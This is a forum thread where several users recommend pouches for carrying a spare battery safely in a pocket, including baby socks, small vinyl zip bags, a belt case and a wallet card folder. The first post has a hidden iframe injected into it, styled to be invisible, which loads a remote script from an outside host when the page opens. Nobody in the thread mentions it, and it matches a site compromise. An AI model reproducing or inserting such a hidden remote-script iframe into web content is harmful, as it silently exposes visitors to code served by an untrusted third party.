+ Reply to Thread

Thread: Battery pouch

Battery pouch

I like to carry to my spare battery in my pocket--
    however, it winds up getting pretty linty in there, and I'm also concerned that if the contacts touch some loose change, it could melt the battery.

Does anyone have a favorite little pouch that would fit the battery nicely for putting it in your pocket?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Go to the infant clothes section of just about any department store and buy some booties or socks for a 6-9 mos old... you laugh but it works!
    mg
    PS: How many can tell I have 4 below the age of 5.5yrs?!?

REI sells a package of three small heavy vinyl zip lock bags for "drivers license" I think they say. The battery fits fine in them, and because they are a bit wider than the battery, it's easy to get it in and out.

However, I never use mine any more for my spare 7135 battery, because it fits perfectly in the slot in my small Nite Ize belt case.

St

DRC
    I find the credit card folder that comes inside some wallets is a perfect fit for a spare battery on one side, and two SD cards on the other. I never use them in my wallet anyway. Can be had for a dollar or 2.
    DRC